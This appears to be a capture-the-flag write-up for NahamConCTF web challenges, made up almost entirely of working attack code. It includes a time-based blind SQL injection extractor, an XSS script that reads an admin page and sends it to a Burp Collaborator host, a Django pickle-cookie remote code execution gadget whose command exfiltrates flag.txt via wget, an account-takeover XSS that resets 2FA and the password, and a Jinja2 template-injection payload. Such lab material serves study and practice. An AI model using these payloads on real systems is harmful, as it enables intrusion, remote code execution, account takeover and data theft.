NahamConCTF — Web Challenges

Personnel

EXtravagant

Jurassic Park

Flaskmetal Alchemist

  1. The app’s main feature is a search form, so SQL injection is the first thing to test.
  2. The flag matches the pattern flag{[a-z]+_[a-z]+_[a-z]+}, which fixes the characters worth guessing to lowercase letters, `_` and the closing `}`.
  3. The fma.zip file.
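#!/usr/bin/env python3
"""Time-based blind SQL injection extractor for the Flaskmetal Alchemist challenge.

The search endpoint's ``order`` parameter is injectable (SQLite).  For each flag
position we inject a CASE expression that makes the database build a large
``randomblob`` only when the guessed character is right, then treat a slow
response as a hit.  The flag format ``flag{[a-z]+_[a-z]+_[a-z]+}`` fixes both
the alphabet and (per the challenge) the 20-character length.
"""
import string
import time

URL = "http://challenge.nahamcon.com:30107/"
HEADERS = {"Content-Type": "application/x-www-form-urlencoded"}
# Route through Burp so the probes can be inspected; set to None to go direct.
PROXY = {"http": "http://10.23.58.1:8080"}
# Flag format: lowercase words separated by '_', closed by '}'.
CHARS = "_}" + string.ascii_lowercase
KNOWN_PREFIX = "flag{"
FLAG_LENGTH = 20  # the flag is 20 chars long
# Responses at or above this many seconds are taken as the "true" branch.
SLOW_THRESHOLD = 3.0
TIMEOUT = 10.0


def build_payload(position: int, char: str) -> str:
    """Return the form body that probes whether flag[position] == char.

    ``position`` is 1-based, as SQLite's ``substr`` expects.  The true branch
    forces randomblob(500000000/4) (slow); the false branch a tiny blob (fast).
    """
    condition = f'substr((select flag from flag),{position},1)="{char}"'
    case = (
        f"(case when {condition} then 1=randomblob(500000000/4) "
        "else 1=randomblob(10000) end)"
    )
    return f"search=fl&order=1 AND {case}"


def is_slow(elapsed: float, threshold: float = SLOW_THRESHOLD) -> bool:
    """True when a probe's latency indicates the injected condition held."""
    return elapsed >= threshold


def extract_flag(measure, start: int = len(KNOWN_PREFIX) + 1,
                 length: int = FLAG_LENGTH) -> str:
    """Recover the flag one position at a time.

    ``measure(position, char)`` must return the probe latency in seconds.
    Testing of a position stops at the first confirmed character (the original
    kept going, so network jitter could append several characters for one
    position).  A position with no slow response is recorded as '?' rather
    than silently skipped, so the output length stays honest.  Extraction
    ends early once the closing '}' is found.
    """
    flag = KNOWN_PREFIX
    for position in range(start, length + 1):
        for char in CHARS:
            elapsed = measure(position, char)
            if is_slow(elapsed):
                flag += char
                print(f"[+] Valid Character Found: {char}\nResponse time: {int(elapsed)}")
                break
        else:
            flag += "?"
            print(f"[-] No character matched at position {position}")
        if flag.endswith("}"):
            break  # closing brace ends the flag; nothing left to probe
    return flag


def main() -> None:
    """Run the extraction against the live target (needs the ``requests`` package)."""
    import requests  # imported here so the pure helpers above stay importable/testable offline

    session = requests.Session()

    def measure(position: int, char: str) -> float:
        started = time.perf_counter()
        try:
            session.post(URL, data=build_payload(position, char),
                         headers=HEADERS, proxies=PROXY, timeout=TIMEOUT)
        except requests.exceptions.Timeout:
            # Slower than the timeout is still "slow": count it as a hit
            # instead of letting the exception abort the whole run.
            return TIMEOUT
        return time.perf_counter() - started

    print("[+] Flag extracted: " + extract_flag(measure))


if __name__ == "__main__":
    main()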

Hacker Ts

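<script>
// Presumably executes inside the challenge's headless renderer (the target
// URL is localhost:5000, only reachable from the server itself): fetch the
// admin page and hand its body to an attacker-controlled host.
var req = new XMLHttpRequest();
req.open("GET", "http://localhost:5000/admin", true);
req.onreadystatechange = exfil;
req.send();
function exfil() {
  // readystatechange fires for HEADERS_RECEIVED and LOADING too; navigating
  // on those would leak an empty/partial body and abort the in-flight request.
  if (req.readyState !== XMLHttpRequest.DONE) return;
  location = "http://zdg8qpo8j2mvfca9lh6jx7dzkqqie7.burpcollaborator.net/?resp=" + encodeURIComponent(req.responseText);
}
</script>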

Poller

import os
import subprocess
from django.core import signing
from django.contrib.sessions.serializers import PickleSerializer
import sys
import requests
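class Exploit(object):
    """Pickle gadget: unpickling an instance runs ``command`` via subprocess.Popen.

    Django's signed-cookie session backend with ``PickleSerializer`` unpickles
    whatever the cookie carries once the signature checks out, so a cookie
    forged with the leaked SECRET_KEY executes the command on the server when
    the session is loaded.  The default command exfiltrates flag.txt to a Burp
    Collaborator host.
    """

    DEFAULT_COMMAND = (
        """ python -c 'import os;os.system("wget http://9x7m994nkzrws6774697m1quyl4cs1.burpcollaborator.net/$(cat flag.txt)");' """
    )

    def __init__(self, command: str = DEFAULT_COMMAND) -> None:
        # NOTE: the default interpolates $(cat flag.txt) raw into a URL; a flag
        # containing shell or URL metacharacters would need encoding first.
        self.command = command

    def __reduce__(self):
        """Tell pickle to rebuild this object by calling Popen(command, ...).

        ``__reduce__`` can only pass positional arguments, so Popen's
        parameters are given in signature order: args, bufsize, executable,
        stdin, stdout, stderr, preexec_fn, close_fds, shell.
        """
        return (subprocess.Popen, (
            self.command,
            0,      # bufsize
            None,   # executable
            None,   # stdin
            None,   # stdout
            None,   # stderr
            None,   # preexec_fn
            False,  # close_fds
            True,   # shell=True: /bin/sh handles the $(...) substitution and quoting
        ))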
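# Leaked Django SECRET_KEY taken from the challenge source.  Anyone holding it
# can mint session cookies the server trusts; combined with PickleSerializer
# that is remote code execution (see Exploit above).
SECRET_KEY = "77m6p#v&(wk_s2+n5na-bqe!m)^zu)9typ#0c&@qd%8o6!"
# Salt used by django.contrib.sessions.backends.signed_cookies; it must match
# the server's or the signature check fails before unpickling happens.
SESSION_SALT = "django.contrib.sessions.backends.signed_cookies"


def forge_session(payload: object, key: str = SECRET_KEY) -> str:
    """Return a signed, compressed pickle session cookie carrying ``payload``.

    ``payload`` is any picklable object; passing an ``Exploit`` instance makes
    the cookie execute its command when the server loads the session.
    """
    return signing.dumps(
        payload,
        salt=SESSION_SALT,
        serializer=PickleSerializer,
        compress=True,
        key=key,
    )


if __name__ == "__main__":
    print(forge_session(Exploit()))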

Two For One

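<script>
// Two-step account takeover from an XSS context.  Both requests go to the
// challenge host with withCredentials set, so (assuming the script runs in the
// victim's browser on that origin) they carry the victim's session cookie.
//
// Step 1 resets 2FA; step 2 submits the post-reset OTP (123456) with a new
// password.  Step 2 must therefore run only after step 1 has completed —
// firing both at once leaves the outcome to a race.
//
// Everything lives in an IIFE: the original declared `req` and `exfil` twice
// at global scope, so the first request's callback read the *second*
// request's responseText.
(function () {
  var base = 'http://challenge.nahamcon.com:30115';
  var attacker = 'http://tlihmptf6rke1aspcnxfwy5m7dd51u.burpcollaborator.net/?url=';

  // Ship a response body to the collaborator host.
  function exfil(text) {
    var send = new XMLHttpRequest();
    send.open('GET', attacker + encodeURIComponent(text), true);
    send.send(null);
  }

  // POST `body` to `path`; exfiltrate the response once it is complete, then
  // run `done` (if given).  The readyState check stops the handler from
  // firing on HEADERS_RECEIVED/LOADING with an empty or partial body.
  function post(path, body, done) {
    var req = new XMLHttpRequest();
    req.open('POST', base + path, true);
    req.withCredentials = true;
    req.setRequestHeader('Content-Type', 'application/json');
    req.onreadystatechange = function () {
      if (req.readyState !== XMLHttpRequest.DONE) return;
      exfil(req.responseText);
      if (done) done();
    };
    req.send(body);
  }

  post('/reset2fa', null, function () {
    // Plain object -> JSON.stringify; the backslash-escaped quotes seen in some
    // copies of this payload are an artifact of embedding it in a string and
    // are a syntax error in a raw <script>.
    post('/reset_password', JSON.stringify({
      otp: '123456',
      password: 'password',
      password2: 'password'
    }));
  });
})();
</script>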

DeafCon

shellbreak{{request.application.__globals__.__builtins__.__import__('os').popen('cat${IFS}flag.txt').read()}}@gmail.com

Jinja2 server-side template injection via the local part of the e-mail address: `request.application` resolves to a Flask callable whose `__globals__` expose `__builtins__.__import__`, which gives `os.popen`; `${IFS}` stands in for the space in `cat flag.txt`, presumably because the input filter rejected spaces.
